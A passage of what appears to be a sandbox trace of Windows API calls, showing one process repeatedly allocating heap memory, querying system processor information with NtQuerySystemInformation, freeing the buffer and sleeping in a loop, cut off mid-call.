[0237.084] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0237.084] Sleep (dwMilliseconds=0x110) [0237.095] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0237.095] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0237.096] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0237.096] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0237.096] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0237.096] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0237.096] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0237.096] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0237.097] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0237.097] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0237.097] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0237.097] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0237.097] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0237.098] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0237.098] Sleep (dwMilliseconds=0x110) [0237.111] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0237.111] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0237.112] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0237.112] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0237.112] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0237.113] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0237.113] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0237.113] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0237.113] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0237.113] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0237.113] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0237.114] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0237.114] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0237.115] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0237.115] Sleep (dwMilliseconds=0x110) [0237.126] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0237.126] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0237.126] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0237.126] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0237.126] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0237.127] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0237.127] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0237.127] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0237.127] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0237.127] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0237.127] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0237.128] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0237.128] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0237.128] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0237.128] Sleep (dwMilliseconds=0x110) [0237.138] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0237.138] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0237.139] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0237.139] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0237.139] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0237.139] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0237.139] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0237.139] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0237.140] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0237.140] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0237.140] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0237.140] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0237.140] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0237.141] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0237.141] Sleep (dwMilliseconds=0x110) [0237.157] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0237.157] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0237.158] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0237.158] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0237.158] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0237.158] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0237.158] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0237.158] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0237.159] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0237.159] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0237.159] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0237.159] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0237.159] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0237.160] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0237.160] Sleep (dwMilliseconds=0x110) [0237.173] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0237.173] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0237.174] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0237.174] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0237.174] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0237.174] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0237.174] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0237.175] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0237.175] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0237.175] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0237.176] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0237.176] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0237.176] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0237.177] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0237.177] Sleep (dwMilliseconds=0x110) [0237.189] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0237.189] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0237.190] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0237.190] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0237.190] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0237.190] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0237.190] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0237.190] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0237.191] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0237.191] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0237.191] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0237.191] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0237.191] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0237.192] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0237.192] Sleep (dwMilliseconds=0x110) [0237.204] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0237.204] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0237.205] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0237.205] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0237.205] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0237.205] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0237.205] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0237.205] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0237.206] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0237.206] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0237.206] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0237.207] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0237.207] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0237.207] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0237.207] Sleep (dwMilliseconds=0x110) [0237.217] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0237.217] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0237.217] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0237.217] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0237.217] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0237.218] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0237.218] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0237.218] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0237.218] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0237.219] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0237.219] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0237.219] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0237.219] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0237.220] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0237.220] Sleep (dwMilliseconds=0x110) [0237.231] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0237.231] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0237.232] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0237.232] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0237.232] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0237.232] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0237.355] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0237.355] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0237.356] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0237.357] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0237.357] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0237.357] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0237.357] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0237.358] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0237.358] Sleep (dwMilliseconds=0x110) [0237.419] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0237.419] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0237.420] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0237.420] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0237.420] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0237.428] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0237.428] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0237.428] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0237.429] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0237.429] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0237.429] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0237.429] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0237.430] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0237.430] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0237.430] Sleep (dwMilliseconds=0x110) [0237.476] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0237.476] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0237.477] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0237.477] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0237.477] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0237.478] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0237.478] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0237.478] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0237.479] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0237.479] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0237.479] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0237.479] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0237.479] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0237.480] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0237.480] Sleep (dwMilliseconds=0x110) [0237.639] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0237.639] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0237.640] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0237.640] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0237.640] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0237.640] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0237.641] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0237.641] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0237.641] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0237.643] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0237.643] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0237.643] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0237.643] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0237.644] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0237.644] Sleep (dwMilliseconds=0x110) [0237.685] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0237.685] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0237.685] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0237.685] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0237.685] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0237.686] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0237.687] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0237.687] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0237.688] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0237.688] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0237.688] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, 